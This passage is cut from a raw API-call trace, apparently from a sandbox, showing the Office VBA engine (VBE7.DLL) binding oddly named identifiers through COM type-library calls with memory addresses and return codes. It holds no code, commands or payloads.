Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.589] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.589] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.589] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.589] IUnknown:Release (This=0x665ba50) returned 0xd [0069.589] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.590] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.590] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.590] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.590] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.590] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.590] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.590] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.590] IUnknown:Release (This=0x665ba50) returned 0xd [0069.590] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.590] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.590] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.590] ITypeComp:RemoteBind (in: This=0x665ba60, szName="qX_QUAA", lHashVal=0x105920, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b810b6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="qX_QUAA") returned 8 [0069.590] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="qX_QUAA", lHashVal=0x105920, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b810b6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="qX_QUAA") returned 8 [0069.590] ITypeComp:RemoteBind (in: This=0x665bd30, szName="qX_QUAA", lHashVal=0x105920, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.590] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qX_QUAA") returned 0x105920 [0069.591] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="qX_QUAA" | out: _Dst="qX_QUAA") returned 0x0 [0069.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="qX_QUAA") returned 8 [0069.591] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.591] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="qX_QUAA", lHashVal=0x105920, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.591] IUnknown:Release (This=0x665ba50) returned 0xd [0069.591] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.591] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="qX_QUAA", lHashVal=0x105920, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.591] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.591] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.591] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="qX_QUAA", lHashVal=0x105920, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.591] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.591] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.591] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="qX_QUAA", lHashVal=0x105920, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.591] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b810b6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="qX_QUAA") returned 8 [0069.591] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="qX_QUAA", lHashVal=0x105920, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.591] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.591] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b810b6 | out: _Dst=0x67c2d40) returned 0x0 [0069.591] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_qX_QUAA") returned 0x104d23 [0069.591] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_qX_QUAA" | out: _Dst="_B_var_qX_QUAA") returned 0x0 [0069.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_qX_QUAA") returned 15 [0069.591] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.591] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_qX_QUAA", lHashVal=0x104d23, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.591] IUnknown:Release (This=0x665ba50) returned 0xd [0069.591] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.591] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_qX_QUAA", lHashVal=0x104d23, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.591] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.591] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.592] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_qX_QUAA", lHashVal=0x104d23, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.592] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.592] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.592] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_qX_QUAA", lHashVal=0x104d23, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.592] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.592] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.592] IUnknown:Release (This=0x665ba50) returned 0xd [0069.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8702ee, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_qX_QUAA") returned 15 [0069.592] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_qX_QUAA", lHashVal=0x104d23, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x55005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x55005100000000, pDummy=0x0) returned 0x0 [0069.592] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b810b6 | out: _Dst=0x144ec0) returned 0x0 [0069.592] ITypeComp:RemoteBind (in: This=0x665ba60, szName="cQAxUA", lHashVal=0x10201a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b811aa, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cQAxUA") returned 7 [0069.592] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="cQAxUA", lHashVal=0x10201a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b811aa, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cQAxUA") returned 7 [0069.592] ITypeComp:RemoteBind (in: This=0x665bd30, szName="cQAxUA", lHashVal=0x10201a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.592] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cQAxUA") returned 0x10201a [0069.592] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="cQAxUA" | out: _Dst="cQAxUA") returned 0x0 [0069.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="cQAxUA") returned 7 [0069.592] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.592] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="cQAxUA", lHashVal=0x10201a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.592] IUnknown:Release (This=0x665ba50) returned 0xd [0069.592] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.592] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="cQAxUA", lHashVal=0x10201a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.592] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.593] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.593] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="cQAxUA", lHashVal=0x10201a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.593] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.593] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.593] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="cQAxUA", lHashVal=0x10201a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.593] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b811aa, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cQAxUA") returned 7 [0069.593] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="cQAxUA", lHashVal=0x10201a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.593] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.593] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b811aa | out: _Dst=0x67c2d40) returned 0x0 [0069.593] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_cQAxUA") returned 0x109ac3 [0069.593] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_cQAxUA" | out: _Dst="_B_var_cQAxUA") returned 0x0 [0069.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_cQAxUA") returned 14 [0069.593] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.593] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_cQAxUA", lHashVal=0x109ac3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.593] IUnknown:Release (This=0x665ba50) returned 0xd [0069.593] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.593] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_cQAxUA", lHashVal=0x109ac3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.593] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.593] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.593] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_cQAxUA", lHashVal=0x109ac3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.593] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.593] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.593] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_cQAxUA", lHashVal=0x109ac3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.593] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.593] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.593] IUnknown:Release (This=0x665ba50) returned 0xd [0069.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87031e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_cQAxUA") returned 14 [0069.594] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_cQAxUA", lHashVal=0x109ac3, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x55007800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x55007800000000, pDummy=0x0) returned 0x0 [0069.594] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b811aa | out: _Dst=0x144ec0) returned 0x0 [0069.594] ITypeComp:RemoteBind (in: This=0x665ba60, szName="DBAAAZQ", lHashVal=0x106527, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81182, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="DBAAAZQ") returned 8 [0069.596] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="DBAAAZQ", lHashVal=0x106527, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81182, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="DBAAAZQ") returned 8 [0069.596] ITypeComp:RemoteBind (in: This=0x665bd30, szName="DBAAAZQ", lHashVal=0x106527, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.596] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DBAAAZQ") returned 0x106527 [0069.596] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="DBAAAZQ" | out: _Dst="DBAAAZQ") returned 0x0 [0069.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="DBAAAZQ") returned 8 [0069.596] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.596] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="DBAAAZQ", lHashVal=0x106527, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.596] IUnknown:Release (This=0x665ba50) returned 0xd [0069.596] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.596] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="DBAAAZQ", lHashVal=0x106527, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.596] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.596] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.596] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="DBAAAZQ", lHashVal=0x106527, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.596] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.596] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.596] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="DBAAAZQ", lHashVal=0x106527, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.596] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81182, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="DBAAAZQ") returned 8 [0069.596] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="DBAAAZQ", lHashVal=0x106527, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.596] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.596] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81182 | out: _Dst=0x67c2d40) returned 0x0 [0069.597] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DBAAAZQ") returned 0x1068ab [0069.597] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_DBAAAZQ" | out: _Dst="_B_var_DBAAAZQ") returned 0x0 [0069.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_DBAAAZQ") returned 15 [0069.597] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.597] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_DBAAAZQ", lHashVal=0x1068ab, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.597] IUnknown:Release (This=0x665ba50) returned 0xd [0069.597] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.597] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_DBAAAZQ", lHashVal=0x1068ab, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.597] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.597] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.597] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_DBAAAZQ", lHashVal=0x1068ab, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.597] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.597] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.597] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_DBAAAZQ", lHashVal=0x1068ab, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.597] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.597] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.597] IUnknown:Release (This=0x665ba50) returned 0xd [0069.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87034e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_DBAAAZQ") returned 15 [0069.597] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_DBAAAZQ", lHashVal=0x1068ab, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.597] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81182 | out: _Dst=0x144ec0) returned 0x0 [0069.597] ITypeComp:RemoteBind (in: This=0x665ba60, szName="PAoAcUo", lHashVal=0x1040ae, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b811d2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PAoAcUo") returned 8 [0069.597] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="PAoAcUo", lHashVal=0x1040ae, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b811d2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PAoAcUo") returned 8 [0069.598] ITypeComp:RemoteBind (in: This=0x665bd30, szName="PAoAcUo", 